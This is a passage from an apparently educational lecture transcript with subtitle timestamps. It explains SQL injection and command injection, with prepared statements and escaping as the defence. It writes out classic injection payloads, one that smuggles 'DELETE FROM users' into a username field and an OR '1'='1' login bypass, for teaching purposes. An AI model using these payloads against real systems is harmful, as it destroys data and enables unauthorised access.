And odds are an adversary is not going to know 803 00:42:50,200 --> 00:42:55,330 exactly what to type the very first time they try to hack into a server. 804 00:42:55,330 --> 00:42:58,330 Rather, it's through trial and error very often 805 00:42:58,330 --> 00:43:01,120 that an adversary might eventually realize, ah, 806 00:43:01,120 --> 00:43:04,150 this is what I could probably type into that website 807 00:43:04,150 --> 00:43:06,520 to inject some code of my own. 808 00:43:06,520 --> 00:43:08,140 So to be clear, what have I typed? 809 00:43:08,140 --> 00:43:12,910 I've still typed my username, M-A-L-A-N, but then I've typed a single quote, 810 00:43:12,910 --> 00:43:18,070 and then a semicolon, and then DELETE FROM users, and then another semicolon, 811 00:43:18,070 --> 00:43:19,300 and then a dash, dash. 812 00:43:19,300 --> 00:43:22,680 Now, if you don't know SQL-- and you're not expected to know SQL for this 813 00:43:22,680 --> 00:43:23,250 cause-- 814 00:43:23,250 --> 00:43:25,410 this looks weird, probably. 815 00:43:25,410 --> 00:43:29,250 But each of these symbols, each of these punctuation symbols, in particular, 816 00:43:29,250 --> 00:43:33,100 means something specific and serves a particular purpose. 817 00:43:33,100 --> 00:43:34,510 Now, what might that be? 818 00:43:34,510 --> 00:43:36,390 Well, me go back to the original query. 819 00:43:36,390 --> 00:43:41,280 And now let me assume that in yellow here, the curly braces with username, 820 00:43:41,280 --> 00:43:43,440 is where my username is supposed to go. 821 00:43:43,440 --> 00:43:45,510 And my username is supposed to be Malan. 822 00:43:45,510 --> 00:43:49,020 But what if I type in that long sequence of cryptic text? 823 00:43:49,020 --> 00:43:51,360 Here's what's going to happen on the server. 824 00:43:51,360 --> 00:43:54,870 Because it's using a language like Python, or PHP, or Java, 825 00:43:54,870 --> 00:43:58,530 this yellow value is going to be "interpolated," 826 00:43:58,530 --> 00:44:01,750 that is, replaced with whatever the human typed in. 827 00:44:01,750 --> 00:44:02,490 So let's do that. 828 00:44:02,490 --> 00:44:06,360 Let me paste in what I, the adversary, typed in. 829 00:44:06,360 --> 00:44:09,700 And notice I've kept yellow the user's input. 830 00:44:09,700 --> 00:44:12,810 So everything in white is still the part of the SQL query 831 00:44:12,810 --> 00:44:16,290 that the designers of the database came up with in advance. 832 00:44:16,290 --> 00:44:20,130 But everything in yellow is what came from a form on the web, an adversary, 833 00:44:20,130 --> 00:44:21,100 in my case. 834 00:44:21,100 --> 00:44:23,040 And this looks a little cryptic still. 835 00:44:23,040 --> 00:44:26,400 But even if you've never seen SQL before, 836 00:44:26,400 --> 00:44:29,190 you might have an intuition for what could go wrong. 837 00:44:29,190 --> 00:44:34,380 Because I, the adversary, typed not only Malan, but a single quote here, 838 00:44:34,380 --> 00:44:38,070 notice that, oh, my goodness, that perfectly lines up 839 00:44:38,070 --> 00:44:42,960 with the single quote that the database designer used in their query. 840 00:44:42,960 --> 00:44:45,960 And so even though this white quote is meant 841 00:44:45,960 --> 00:44:49,620 to be closed by this white quote way over here, 842 00:44:49,620 --> 00:44:52,350 notice that grammatically in this language, 843 00:44:52,350 --> 00:44:56,280 not to mention in English and other human languages, this single quote here 844 00:44:56,280 --> 00:44:58,950 or apostrophe, because it comes first, will 845 00:44:58,950 --> 00:45:04,620 be presumed to close this single quote or this apostrophe here. 846 00:45:04,620 --> 00:45:08,160 The semicolon, it turns out in this language, SQL, ends a thought. 847 00:45:08,160 --> 00:45:09,690 It's like a period in English. 848 00:45:09,690 --> 00:45:14,080 And so anything after a semicolon is like a new command altogether. 849 00:45:14,080 --> 00:45:18,330 So notice that DELETE FROM users semicolon is like a second command that 850 00:45:18,330 --> 00:45:20,400 came entirely from me, the adversary. 851 00:45:20,400 --> 00:45:23,520 And then dash, dash, it turns out-- and this is very clever. 852 00:45:23,520 --> 00:45:27,720 Dash, dash a lot of versions of SQL represents a "comment." 853 00:45:27,720 --> 00:45:32,280 And a comment in a programming language means ignore everything after this 854 00:45:32,280 --> 00:45:36,720 because a problem right now is that single quote, that apostrophe, 855 00:45:36,720 --> 00:45:39,840 was meant to surround the user's username. 856 00:45:39,840 --> 00:45:43,230 But because I, the adversary, already gave you a single quote 857 00:45:43,230 --> 00:45:47,230 to use accidentally as closing this thought, 858 00:45:47,230 --> 00:45:50,200 well, we don't need this single quote at the very end anymore. 859 00:45:50,200 --> 00:45:53,860 So this is why the adversary, or me in this story is doing dash, dash. 860 00:45:53,860 --> 00:45:56,820 That's just going to tell the server, OK, ignore everything 861 00:45:56,820 --> 00:46:01,710 after that, including the single quote that we do not need grammatically. 862 00:46:01,710 --> 00:46:03,150 So let me reformat this a bit. 863 00:46:03,150 --> 00:46:06,113 I'm going to go ahead and add some new lines, some white space, just 864 00:46:06,113 --> 00:46:07,530 to make it a little more readable. 865 00:46:07,530 --> 00:46:13,260 What you see on the screen here right now is equivalent to this. 866 00:46:13,260 --> 00:46:16,410 Notice that I've moved the Delete command to a own line 867 00:46:16,410 --> 00:46:17,760 just for readability's sake. 868 00:46:17,760 --> 00:46:21,300 I've gotten rid of the final apostrophe, the single quote, 869 00:46:21,300 --> 00:46:23,820 because it was after a comment, which means by design, 870 00:46:23,820 --> 00:46:25,090 it's meant to be ignored. 871 00:46:25,090 --> 00:46:29,640 So what I have done as the adversary because I presumed, or inferred, 872 00:46:29,640 --> 00:46:33,330 or figured out that this website is using single quotes and they're just 873 00:46:33,330 --> 00:46:37,290 blindly interpolating, that is, replacing those curly braces 874 00:46:37,290 --> 00:46:41,790 and username with literally anything I type in, I can trick the server 875 00:46:41,790 --> 00:46:45,990 into finishing this first command by saying SELECT * FROM users WHERE 876 00:46:45,990 --> 00:46:48,360 username='malan';. 877 00:46:48,360 --> 00:46:51,630 And worse, I can trick this particular database 878 00:46:51,630 --> 00:46:55,710 into executing a second SQL command, which even if again, you've never seen 879 00:46:55,710 --> 00:46:58,490 SQL, deleting is probably a bad thing. 880 00:46:58,490 --> 00:47:00,240 It's probably a destructive thing that you 881 00:47:00,240 --> 00:47:02,700 don't want some random adversary on the internet being 882 00:47:02,700 --> 00:47:04,810 able to do on your server. 883 00:47:04,810 --> 00:47:07,300 So what's the goal of these lines here? 884 00:47:07,300 --> 00:47:09,600 Well, the original intent of the first query, 885 00:47:09,600 --> 00:47:13,047 presumably, I claimed, was just to search for the user in the database, 886 00:47:13,047 --> 00:47:14,130 so that they could log in. 887 00:47:14,130 --> 00:47:16,770 So when I type in Malan and hit Enter, I am somehow 888 00:47:16,770 --> 00:47:20,340 able to log in, probably, after typing also a password, maybe 889 00:47:20,340 --> 00:47:22,200 a two-factor code or the like. 890 00:47:22,200 --> 00:47:25,950 But SELECT * users WHERE username=malan, fine. 891 00:47:25,950 --> 00:47:28,110 That's probably going to retrieve the information 892 00:47:28,110 --> 00:47:29,640 that it was supposed to retrieve. 893 00:47:29,640 --> 00:47:33,000 The dangerous part here is that I tricked this server 894 00:47:33,000 --> 00:47:35,230 into executing a second command. 895 00:47:35,230 --> 00:47:36,780 And this one looks destructive. 896 00:47:36,780 --> 00:47:41,160 DELETE FROM user; means delete all of the users from the system. 897 00:47:41,160 --> 00:47:44,610 So it doesn't help the adversary in this case get into the system 898 00:47:44,610 --> 00:47:49,590 or do anything with the Malan account other than delete it and literally 899 00:47:49,590 --> 00:47:52,240 every other account in the system. 900 00:47:52,240 --> 00:47:53,710 So this is bad. 901 00:47:53,710 --> 00:47:59,190 This is representative of a SQL injection, whereby I, the adversary, 902 00:47:59,190 --> 00:48:03,510 wrote code that you, the designer of this database, accidentally, 903 00:48:03,510 --> 00:48:08,100 naively treated as part of your own commands. 904 00:48:08,100 --> 00:48:11,710 So how else could things go wrong? 905 00:48:11,710 --> 00:48:14,790 Well, not only could you do something destructive like deleting data 906 00:48:14,790 --> 00:48:15,540 from the database. 907 00:48:15,540 --> 00:48:18,210 But suppose that the user is prompted at the same time 908 00:48:18,210 --> 00:48:20,820 for a username and a password now in this story, 909 00:48:20,820 --> 00:48:25,240 and suppose, therefore, that the query in the software is this, 910 00:48:25,240 --> 00:48:28,210 SELECT * FROM users WHERE username equals, 911 00:48:28,210 --> 00:48:30,970 quote, unquote, "username" in curly braces, but one more 912 00:48:30,970 --> 00:48:35,440 phrase, AND password equals, quote, unquote, 913 00:48:35,440 --> 00:48:39,340 "password" based on whatever the human typed in as their password. 914 00:48:39,340 --> 00:48:42,520 So again, to be clear, in this story, the user 915 00:48:42,520 --> 00:48:44,560 is prompted for a username and a password. 916 00:48:44,560 --> 00:48:48,910 And the SQL command that's going to use those two values looks like this. 917 00:48:48,910 --> 00:48:52,720 But here, too, we're setting the stage for an injection attack. 918 00:48:52,720 --> 00:48:53,260 Why? 919 00:48:53,260 --> 00:48:56,350 Because based on these placeholders with the curly braces 920 00:48:56,350 --> 00:48:58,960 around username and password, it looks like we're just 921 00:48:58,960 --> 00:49:04,180 going to blindly plug in to this command exactly what it 922 00:49:04,180 --> 00:49:08,420 is the human had typed for their username and password respectively. 923 00:49:08,420 --> 00:49:11,540 So what could a more sophisticated adversary now do? 924 00:49:11,540 --> 00:49:14,140 Well, maybe instead of typing in Malan and then 925 00:49:14,140 --> 00:49:17,692 whatever Malan's actual password is, suppose that they just 926 00:49:17,692 --> 00:49:20,650 want to get into someone's account, maybe Malan's, maybe someone else's 927 00:49:20,650 --> 00:49:21,490 altogether? 928 00:49:21,490 --> 00:49:27,360 What if the adversary doesn't just type Malan, not to mention Malan's password, 929 00:49:27,360 --> 00:49:32,820 but what if they type in this specifically for Malan's password? 930 00:49:32,820 --> 00:49:33,770 Now, this is weird. 931 00:49:33,770 --> 00:49:36,180 And I'll tell you now, this is not, in fact, my password. 932 00:49:36,180 --> 00:49:38,180 But what has the adversary typed in? 933 00:49:38,180 --> 00:49:42,050 A single quote, the word or, then another single quote 934 00:49:42,050 --> 00:49:45,710 with a one and a single quote equals a single quote and a one. 935 00:49:45,710 --> 00:49:48,080 So this looks very, very weird. 936 00:49:48,080 --> 00:49:49,590 But let's see what happens. 937 00:49:49,590 --> 00:49:51,620 And again, most adversaries wouldn't figure this 938 00:49:51,620 --> 00:49:53,480 out the first time they try. 939 00:49:53,480 --> 00:49:56,930 Odds are, they'd be trying a whole bunch of techniques and heuristics 940 00:49:56,930 --> 00:49:59,210 to figure out what might actually work for them. 941 00:49:59,210 --> 00:50:02,210 So we're fast forwarding to the end of the story where the adversary has 942 00:50:02,210 --> 00:50:07,280 figured out that this weird sequence of characters can hack into this server 943 00:50:07,280 --> 00:50:10,560 by tricking it into executing code that wasn't intended. 944 00:50:10,560 --> 00:50:14,180 So here again in yellow is exactly what the adversary has typed in, 945 00:50:14,180 --> 00:50:16,940 Malan, which may very well be a legitimate username, 946 00:50:16,940 --> 00:50:21,560 but then for the password in yellow, single quote or single quote, 947 00:50:21,560 --> 00:50:24,500 one single quote equals single quote one. 948 00:50:24,500 --> 00:50:27,020 And based on our previous example, you can, perhaps, 949 00:50:27,020 --> 00:50:29,120 see what's starting to go on here. 950 00:50:29,120 --> 00:50:32,120 We've finished the Malan thought naturally. 951 00:50:32,120 --> 00:50:35,030 We didn't type anything malicious for the username this time. 952 00:50:35,030 --> 00:50:38,450 But we did type something seemingly malicious for the password. 953 00:50:38,450 --> 00:50:41,660 And the first single quote in yellow quickly 954 00:50:41,660 --> 00:50:44,990 finishes the password thought, quote, unquote, nothing in between. 955 00:50:44,990 --> 00:50:49,040 But then we're saying or, quote, unquote, one equals, quote, one. 956 00:50:49,040 --> 00:50:49,670 Why? 957 00:50:49,670 --> 00:50:52,400 Well, the adversary in this case kind of figured out, or knew, 958 00:50:52,400 --> 00:50:57,300 or guessed that the SQL command ends with a single quote itself. 959 00:50:57,300 --> 00:51:00,200 So the whole point here is even though this, too, probably looks 960 00:51:00,200 --> 00:51:04,790 very cryptic is that grammatically, what the adversary has typed 961 00:51:04,790 --> 00:51:08,390 in not only perfectly aligns with the username field, 962 00:51:08,390 --> 00:51:10,400 because it's just Malan, nothing special there, 963 00:51:10,400 --> 00:51:13,760 but very cleverly, the adversary has finished 964 00:51:13,760 --> 00:51:16,910 the thought of this single quote and also finished 965 00:51:16,910 --> 00:51:18,840 the thought of this single quote. 966 00:51:18,840 --> 00:51:21,890 So we've made everything balanced, just like you would not only in SQL, 967 00:51:21,890 --> 00:51:23,720 but in a language like English. 968 00:51:23,720 --> 00:51:25,700 So let me go ahead and clean this up a little 969 00:51:25,700 --> 00:51:28,920 bit too to make clear why this is dangerous. 970 00:51:28,920 --> 00:51:31,970 This command now, once formed by the server, 971 00:51:31,970 --> 00:51:35,022 based on that adversary's input, is really the same as this. 972 00:51:35,022 --> 00:51:37,730 And I'm just going to add, again, a new line and some white space 973 00:51:37,730 --> 00:51:40,170 just to help us wrap our minds around what's going on. 974 00:51:40,170 --> 00:51:42,650 So I've just moved the or line to the bottom. 975 00:51:42,650 --> 00:51:45,440 And just like in math class years ago, let 976 00:51:45,440 --> 00:51:47,870 me go ahead and put parentheses around things here 977 00:51:47,870 --> 00:51:52,580 that makes clear what the precedence is of things like and and or. 978 00:51:52,580 --> 00:51:55,070 It turns out that and, like multiplication, 979 00:51:55,070 --> 00:51:56,667 binds at a higher precedence. 980 00:51:56,667 --> 00:51:57,500 It's more important. 981 00:51:57,500 --> 00:51:58,792 You're supposed to do it first. 982 00:51:58,792 --> 00:52:02,000 So I'm going to add parentheses now to this first expression. 983 00:52:02,000 --> 00:52:03,350 They're not strictly necessary. 984 00:52:03,350 --> 00:52:04,253 They're implied. 985 00:52:04,253 --> 00:52:06,920 I'm just making them explicit now to show you, just like in math 986 00:52:06,920 --> 00:52:09,210 class, the order of operations. 987 00:52:09,210 --> 00:52:10,590 Now, what does this mean? 988 00:52:10,590 --> 00:52:13,680 This means that the database is going to say, SELECT & FROM users-- 989 00:52:13,680 --> 00:52:15,500 so select everything from the users table-- 990 00:52:15,500 --> 00:52:20,480 WHERE the username is 'malan' and the password is quote unquote. 991 00:52:20,480 --> 00:52:22,580 Now, that is probably not my password. 992 00:52:22,580 --> 00:52:24,560 My password is definitely not nothing. 993 00:52:24,560 --> 00:52:25,730 It's not empty. 994 00:52:25,730 --> 00:52:27,350 But that doesn't matter now. 995 00:52:27,350 --> 00:52:28,040 Why? 996 00:52:28,040 --> 00:52:33,650 Because even if this first clause, WHERE username = 'malan' and password = quote 997 00:52:33,650 --> 00:52:37,490 unquote-- even if that doesn't find anyone in the database with a username 998 00:52:37,490 --> 00:52:41,060 of 'malan' and a password of quote unquote, it doesn't matter, 999 00:52:41,060 --> 00:52:44,690 because we've tricked the database command into including an OR, 1000 00:52:44,690 --> 00:52:48,050 which is so stupid that it's always true-- 1001 00:52:48,050 --> 00:52:49,970 OR '1' = '1'. 1002 00:52:49,970 --> 00:52:55,580 Well, 1 always equals 1, which means that now, logically, this query is 1003 00:52:55,580 --> 00:52:59,690 going to return everything we know about users from the database. 1004 00:52:59,690 --> 00:53:01,290 And why is this problematic? 1005 00:53:01,290 --> 00:53:04,880 Well, when you're logging users into a database-- logging users into a website 1006 00:53:04,880 --> 00:53:08,210 or application, you're typically searching for them in the database. 1007 00:53:08,210 --> 00:53:11,090 And typically, if you get back one or more users, 1008 00:53:11,090 --> 00:53:14,660 you're going to assume that the very first user is the one that you want. 1009 00:53:14,660 --> 00:53:17,060 And maybe in this case, it's Malan, but it's also 1010 00:53:17,060 --> 00:53:21,800 very common in servers for the very first user that was created to be you, 1011 00:53:21,800 --> 00:53:23,240 the person that designed the site. 1012 00:53:23,240 --> 00:53:25,820 And you probably have administrative privileges-- 1013 00:53:25,820 --> 00:53:28,290 that is, access over everything in this system. 1014 00:53:28,290 --> 00:53:32,040 And so if a query like this is returning all of the users, 1015 00:53:32,040 --> 00:53:36,290 including you as the very first one, if there's additional code in the system 1016 00:53:36,290 --> 00:53:40,310 that we won't put on the screen here or bother hypothesizing about, 1017 00:53:40,310 --> 00:53:44,180 it means that you could be now letting the adversary 1018 00:53:44,180 --> 00:53:47,810 log in maybe as Malan, but worse, maybe as you, 1019 00:53:47,810 --> 00:53:51,050 all because you trusted user input. 1020 00:53:51,050 --> 00:53:54,620 But you should never trust that your users, if called Malan, 1021 00:53:54,620 --> 00:53:56,240 are going to type in just 'malan'. 1022 00:53:56,240 --> 00:53:59,540 You should always assume that there's someone out there, very annoyingly, 1023 00:53:59,540 --> 00:54:03,890 very maliciously, that's going to try using some single quotes, 1024 00:54:03,890 --> 00:54:08,660 some semicolons-- or in HTML, we saw a less-than sign or greater-than sign. 1025 00:54:08,660 --> 00:54:11,210 You should always expect that someone on the internet 1026 00:54:11,210 --> 00:54:15,500 will have enough time and interest in hacking your website or application 1027 00:54:15,500 --> 00:54:19,080 that this might indeed happen to you and your software. 1028 00:54:19,080 --> 00:54:20,900 So what's the solution, then? 1029 00:54:20,900 --> 00:54:25,062 How do you avoid a query that's equivalent ultimately to this-- 1030 00:54:25,062 --> 00:54:27,020 because if there's no 'malan' with no password, 1031 00:54:27,020 --> 00:54:30,680 it's still the same as asking for WHERE '1' = '1', which is anything. 1032 00:54:30,680 --> 00:54:32,510 And to be clear, I didn't have to use 1. 1033 00:54:32,510 --> 00:54:35,210 I could have used 2 or 3 or 4. 1034 00:54:35,210 --> 00:54:37,865 I could have used "cat" or "dog" or anything else. 1035 00:54:37,865 --> 00:54:40,490 So long as the thing on the left equals the thing on the right, 1036 00:54:40,490 --> 00:54:44,150 and I type that into the application, the same thing 1037 00:54:44,150 --> 00:54:47,090 would certainly equal itself, is the point here, 1038 00:54:47,090 --> 00:54:49,820 and 1 is just the simplest thing we could think of. 1039 00:54:49,820 --> 00:54:54,840 So what is the solution here, to SQL injection attack specifically? 1040 00:54:54,840 --> 00:54:58,370 Well, it's very similar in spirit to the notion of character escapes. 1041 00:54:58,370 --> 00:55:01,940 But in the world of SQL, there tend to be standard ways 1042 00:55:01,940 --> 00:55:04,130 of escaping dangerous characters. 1043 00:55:04,130 --> 00:55:05,540 You don't have to do it yourself. 1044 00:55:05,540 --> 00:55:09,020 And much like security in general, with encryption specifically, 1045 00:55:09,020 --> 00:55:13,160 you probably should not be writing code yourself to solve problems 1046 00:55:13,160 --> 00:55:15,950 like these that hundreds, thousands, millions of people 1047 00:55:15,950 --> 00:55:19,890 before you have already had to deal with and have probably solved correctly. 1048 00:55:19,890 --> 00:55:23,900 Do not reinvent wheels when you don't need to in the context of security. 1049 00:55:23,900 --> 00:55:27,650 So this is to say, in the world of databases, most databases support 1050 00:55:27,650 --> 00:55:32,060 what are called prepared statements, which is a fancy way of saying that you 1051 00:55:32,060 --> 00:55:34,760 provide the code for your SQL query. 1052 00:55:34,760 --> 00:55:38,780 You provide placeholders for wherever you want user input. 1053 00:55:38,780 --> 00:55:44,690 But let the database itself replace or interpolate those placeholders 1054 00:55:44,690 --> 00:55:46,770 with the user's actual input. 1055 00:55:46,770 --> 00:55:50,330 And let the database handle escaping anything dangerous. 1056 00:55:50,330 --> 00:55:54,350 And we've seen that things are dangerous, like apostrophes thus far. 1057 00:55:54,350 --> 00:55:59,390 So, for instance, instead of writing a single apostrophe-- and this 1058 00:55:59,390 --> 00:56:00,560 is weird, admittedly. 1059 00:56:00,560 --> 00:56:05,030 In the world of SQL, the way you typically escape an apostrophe 1060 00:56:05,030 --> 00:56:06,170 is not like HTML. 1061 00:56:06,170 --> 00:56:09,800 You don't do &apos semicolon. 1062 00:56:09,800 --> 00:56:13,580 You don't, like in some languages, put a backslash in front of it, typically. 1063 00:56:13,580 --> 00:56:18,650 The way, weirdly, you escape a single quote or an apostrophe in SQL 1064 00:56:18,650 --> 00:56:22,760 is very often by putting two of them in a row. 1065 00:56:22,760 --> 00:56:23,810 So why? 1066 00:56:23,810 --> 00:56:25,470 We'll defer that to another day. 1067 00:56:25,470 --> 00:56:27,140 But this is just the convention. 1068 00:56:27,140 --> 00:56:29,450 Now, this means that you could write code that changes 1069 00:56:29,450 --> 00:56:31,520 any single quote to two single quotes. 1070 00:56:31,520 --> 00:56:33,350 But again, don't bother doing that. 1071 00:56:33,350 --> 00:56:35,870 Use functionality that comes with the database 1072 00:56:35,870 --> 00:56:37,530 or whatever library you're using. 1073 00:56:37,530 --> 00:56:40,730 So, for instance, if we go back to that very first query that 1074 00:56:40,730 --> 00:56:45,590 was vulnerable to being injected with something like, DELETE FROM users, 1075 00:56:45,590 --> 00:56:47,130 what if we now do this? 1076 00:56:47,130 --> 00:56:50,630 Let's change our Python-based placeholder, using 1077 00:56:50,630 --> 00:56:54,800 curly braces in yellow here, and let's change that and get rid of the quotes 1078 00:56:54,800 --> 00:56:56,240 and just put a question mark. 1079 00:56:56,240 --> 00:56:59,575 This is one of the common conventions in prepared statements, where 1080 00:56:59,575 --> 00:57:02,450 you put a question mark not because you don't know what to put there, 1081 00:57:02,450 --> 00:57:05,630 but because you want the database to replace that question 1082 00:57:05,630 --> 00:57:08,360 mark with a user's own input. 1083 00:57:08,360 --> 00:57:09,600 Then what happens? 1084 00:57:09,600 --> 00:57:13,160 Well, if the user types in that dangerous command 1085 00:57:13,160 --> 00:57:16,890 with the DELETE inside of it, notice what happens. 1086 00:57:16,890 --> 00:57:18,650 Here's the single quote. 1087 00:57:18,650 --> 00:57:20,330 Here's the close single quote. 1088 00:57:20,330 --> 00:57:23,630 And the database has given that to you automatically. 1089 00:57:23,630 --> 00:57:26,870 The prepared statement adds those single quotes for you. 1090 00:57:26,870 --> 00:57:29,450 Notice that even though I, the adversary, 1091 00:57:29,450 --> 00:57:33,980 only typed in 'malan' single quote semicolon, 1092 00:57:33,980 --> 00:57:38,630 the prepared statement has gone ahead and escaped a single quote 1093 00:57:38,630 --> 00:57:41,610 or apostrophe with two of them instead. 1094 00:57:41,610 --> 00:57:44,600 And nothing else here thereafter is actually too worrisome. 1095 00:57:44,600 --> 00:57:48,570 That alone is sufficient to solve the problem. 1096 00:57:48,570 --> 00:57:51,530 Now, this looks a little weird, right, because it kind of 1097 00:57:51,530 --> 00:57:55,110 looks like, logically, well, you still have this quote and this quote, 1098 00:57:55,110 --> 00:57:58,460 which line up, and you still have this quote and this quote, which line up. 1099 00:57:58,460 --> 00:58:01,460 So it looks like we haven't really fundamentally solved the problem, 1100 00:58:01,460 --> 00:58:02,370 but we have. 1101 00:58:02,370 --> 00:58:06,770 It turns out, in SQL databases, anytime they see two single quotes back 1102 00:58:06,770 --> 00:58:09,110 to back, they don't try to pair them with something 1103 00:58:09,110 --> 00:58:10,910 to the left or something to the right. 1104 00:58:10,910 --> 00:58:16,140 They just treat it as one special escape sequence, so to speak. 1105 00:58:16,140 --> 00:58:18,030 So that would then fix this query. 1106 00:58:18,030 --> 00:58:21,020 And if we go back to the second query, which had two placeholders, 1107 00:58:21,020 --> 00:58:23,570 [? username ?] and [? password ?] using this Python syntax, 1108 00:58:23,570 --> 00:58:26,480 let me go ahead and change that to prepared statement syntax using, 1109 00:58:26,480 --> 00:58:30,440 in this case, question marks without quotes and trust that the database 1110 00:58:30,440 --> 00:58:34,400 itself will add any necessary quotes and escape any potentially dangerous 1111 00:58:34,400 --> 00:58:35,190 characters. 1112 00:58:35,190 --> 00:58:37,910 Now, what did the adversary type in in that second scenario? 1113 00:58:37,910 --> 00:58:41,000 Well, it was just innocuously 'malan', and so that comes back from 1114 00:58:41,000 --> 00:58:44,870 the prepared statement as being prepared with quote unquote on the outside. 1115 00:58:44,870 --> 00:58:45,890 No problem there. 1116 00:58:45,890 --> 00:58:51,080 But this other input from the user, from the adversary's password, which 1117 00:58:51,080 --> 00:58:53,490 was very cryptic with lots of single quotes-- 1118 00:58:53,490 --> 00:58:57,770 notice that every single quote in the adversary's so-called password 1119 00:58:57,770 --> 00:59:01,310 has been escaped so that the single quote here becomes two. 1120 00:59:01,310 --> 00:59:02,810 The single quote here becomes two. 1121 00:59:02,810 --> 00:59:04,010 The single quote here becomes two. 1122 00:59:04,010 --> 00:59:05,427 The single quote here becomes two. 1123 00:59:05,427 --> 00:59:09,830 And the prepared statement automatically adds a final single quote 1124 00:59:09,830 --> 00:59:10,920 at the very end. 1125 00:59:10,920 --> 00:59:14,900 But I've kept highlighted in yellow everything that represents the user's 1126 00:59:14,900 --> 00:59:18,200 input now that it's been properly escaped, because, again, 1127 00:59:18,200 --> 00:59:21,680 even though you might try mentally to pair this quote with this one, 1128 00:59:21,680 --> 00:59:23,670 this one with this one, this one with this one, 1129 00:59:23,670 --> 00:59:26,060 and so forth, that's not what the database does. 1130 00:59:26,060 --> 00:59:29,900 Whenever it sees, in this case, two apostrophes back to back, 1131 00:59:29,900 --> 00:59:32,880 they are treated as special escape sequences. 1132 00:59:32,880 --> 00:59:37,040 And so the only quotes that ultimately are treated as lining up 1133 00:59:37,040 --> 00:59:42,258 are the two around the username and the two around the entire password here. 1134 00:59:42,258 --> 00:59:44,300 So the characters are still in there, but they've 1135 00:59:44,300 --> 00:59:48,440 been escaped, sanitized, or scrubbed, so to speak, in such the way 1136 00:59:48,440 --> 00:59:52,340 that now the database is smart enough not to mistake those for quotes 1137 00:59:52,340 --> 00:59:55,520 that should be matched with ones that we might have otherwise 1138 00:59:55,520 --> 00:59:56,750 written previously. 1139 00:59:56,750 --> 01:00:01,430 Now, there is another class of attacks that similarly involve injection 1140 01:00:01,430 --> 01:00:04,710 into your software, particularly command injection. 1141 01:00:04,710 --> 01:00:07,580 Those of you familiar with a command-line interface 1142 01:00:07,580 --> 01:00:09,920 in the context of a terminal window or the like 1143 01:00:09,920 --> 01:00:12,560 might be familiar with how on a system you 1144 01:00:12,560 --> 01:00:15,620 type commands as opposed to always using your mouse to point 1145 01:00:15,620 --> 01:00:17,390 and click on menus and buttons. 1146 01:00:17,390 --> 01:00:20,000 The problem with command injection is that it's all 1147 01:00:20,000 --> 01:00:22,820 too easy in a lot of today's programming languages 1148 01:00:22,820 --> 01:00:27,480 to write code that invokes commands on systems, 1149 01:00:27,480 --> 01:00:31,880 whether it's to copy files, delete files, move files, execute 1150 01:00:31,880 --> 01:00:33,320 other commands altogether. 1151 01:00:33,320 --> 01:00:35,540 And that's because a lot of programming languages 1152 01:00:35,540 --> 01:00:40,610 come with functions that has a feature called system, which is literally 1153 01:00:40,610 --> 01:00:45,020 a feature of some programming languages that allow you in your program 1154 01:00:45,020 --> 01:00:48,170 to execute a command on the underlying system, a command 1155 01:00:48,170 --> 01:00:49,820 and the underlying operating system. 1156 01:00:49,820 --> 01:00:53,270 And that might be useful for you because in addition 1157 01:00:53,270 --> 01:00:55,820 to writing your own code in some higher-level language, 1158 01:00:55,820 --> 01:00:59,300 you can occasionally run a command on the system itself. 1159 01:00:59,300 --> 01:01:02,060 But the problem is that if you, the programmer, 1160 01:01:02,060 --> 01:01:07,070 somehow take user input and you just blindly pass that user's input 1161 01:01:07,070 --> 01:01:10,550 to the command line, so to speak-- to the terminal window, 1162 01:01:10,550 --> 01:01:12,350 to the underlying operating system-- 1163 01:01:12,350 --> 01:01:16,580 that is yet another context in which potentially dangerous characters, 1164 01:01:16,580 --> 01:01:21,500 like semicolons or the like, could accidentally finish your thought 1165 01:01:21,500 --> 01:01:24,470 but then start a completely new one from the adversary 1166 01:01:24,470 --> 01:01:27,860 so that they, too, on your system can not only 1167 01:01:27,860 --> 01:01:30,320 delete things like data from your database, 1168 01:01:30,320 --> 01:01:32,780 but even files from your file system. 1169 01:01:32,780 --> 01:01:36,020 They could perhaps send email or spam or do anything 1170 01:01:36,020 --> 01:01:39,830 in a command-line environment that you yourself could do on the same. 1171 01:01:39,830 --> 01:01:42,080 In other programming languages, the same idea 1172 01:01:42,080 --> 01:01:45,230 exists in the context of another function called eval, 1173 01:01:45,230 --> 01:01:48,410 which evaluates whatever you pass to it. 1174 01:01:48,410 --> 01:01:52,370 So there, too-- if you're in the habit of using system or eval, 1175 01:01:52,370 --> 01:01:58,130 taking user input, and passing that user input as part of the input to system 1176 01:01:58,130 --> 01:02:02,210 or eval without having sanitized it or scrubbed it or, more generally, 1177 01:02:02,210 --> 01:02:04,970 "escaped" potentially dangerous characters, 1178 01:02:04,970 --> 01:02:10,550 you're putting your entire system at risk and any and all software that's 1179 01:02:10,550 --> 01:02:13,440 installed on or running on the same. 1180 01:02:13,440 --> 01:02:14,930 So what's the solution here? 1181 01:02:14,930 --> 01:02:17,240 In any of those programming languages to which 1182 01:02:17,240 --> 01:02:19,850 I'm alluding that have functions like system or eval-- 1183 01:02:19,850 --> 01:02:23,170 they almost always come with another function 1184 01:02:23,170 --> 01:02:27,110 or built into these functions a way of escaping the user's input. 1185 01:02:27,110 --> 01:02:30,610 So I would always take care to read the documentation if you yourself 1186 01:02:30,610 --> 01:02:35,620 are or want to become a programmer, that whenever you take user input, 1187 01:02:35,620 --> 01:02:38,560 you always figure out and think to yourself, wait a minute, 1188 01:02:38,560 --> 01:02:41,770 how can I escape this properly so that I can't 1189 01:02:41,770 --> 01:02:48,400 be tricked into executing some command, some SQL, or some HTML and JavaScript 1190 01:02:48,400 --> 01:02:50,772 within my own software? 1191 01:02:50,772 --> 01:02:51,980 All right, that's been a lot. 1192 01:02:51,980 --> 01:02:54,022 Let's go ahead here and take a five-minute break. 1193 01:02:54,022 --> 01:02:56,800 And when we resume, we'll look at a whole other category 1194 01:02:56,800 --> 01:03:00,000 of potential attacks on software. 1195 01:03:00,000 --> 01:03:01,570 All right, we're back. 1196 01:03:01,570 --> 01:03:05,040 Let's go ahead and return to this world of HTML on the web, 1197 01:03:05,040 --> 01:03:08,430 if only because so much of today's software is actually web based. 1198 01:03:08,430 --> 01:03:10,920 And indeed, even on your Macs or PCs or phones, 1199 01:03:10,920 --> 01:03:13,690 what looks like a native application, so to speak, 1200 01:03:13,690 --> 01:03:16,320 might actually still be implemented in HTML 1201 01:03:16,320 --> 01:03:18,840 with that other language, JavaScript and CSS. 1202 01:03:18,840 --> 01:03:21,030 Well, it turns out, in the context of a browser, 1203 01:03:21,030 --> 01:03:23,652 there's very often 